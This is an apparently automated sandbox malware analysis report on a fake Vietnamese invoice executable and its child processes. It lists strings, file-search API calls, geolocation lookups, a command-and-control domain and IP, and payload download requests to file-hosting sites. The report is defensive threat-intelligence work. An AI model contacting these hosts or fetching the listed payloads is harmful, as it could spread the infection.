Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546933251.0000000003573000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546933251.0000000003573000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	12_2_100010F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 12_2_10006580 FindFirstFileExA,	12_2_10006580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0040AE51 FindFirstFileW,FindNextFileW,	14_2_0040AE51

Networking

May check the online IP address of the machine

Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: icanhazip.com
Source: unknown	DNS query: name: icanhazip.com

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: obologs.work.gd

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /get/3GTNpY/Rtbdyyicls.bmp HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /y4mDTH7qGldoE19yex0JjOdCD7abQr3OT41x7HoVD-gSuwIqkSH1AKWWpBjmzkRc7T3d2yA9EtMAW60GsmirtvPUp6RtxG0vbsoNucdsykCwq3jc27R9OIRlOBAKG77PDK48M1AU1FOWPORMg8h_n8eC1Mlf5d263KxZye7r7rCgu9kdKTmlRfJThNYHju2p84XwXYfLp3XHRIFl1Rz8c3WRw/Xqpxc.png?download&psid=1 HTTP/1.1Host: kpf0yw.am.files.1drv.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Uses a known web browser user agent for HTTP communication

Source: global traffic

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: DANILENKODE DANILENKODE

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 13.107.43.12 13.107.43.12
Source: Joe Sandbox View	IP Address: 194.5.98.244 194.5.98.244

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.3:49699 -> 194.5.98.244:4044

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.549304612.0000000003638000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.549295120.0000000003618000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: bhv8995.tmp.39.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: aspnet_compiler.exe, 0000000C.00000003.360263482.0000000003E57000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000003.357358743.0000000003E51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globals
Source: aspnet_compiler.exe, 0000000C.00000003.360263482.0000000003E57000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000003.360708645.0000000003E02000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000003.357358743.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000003.480125724.0000000003E39000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.563713408.0000000006E90000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.529750715.0000000000884000.00000004.00000020.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: aspnet_compiler.exe, 0000000C.00000003.477736669.0000000004001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.549304612.0000000003638000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.549295120.0000000003618000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g7.crl0/
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g7.crl0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://geoplugin.net/json.gp
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17milU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xCDZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xMWp?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
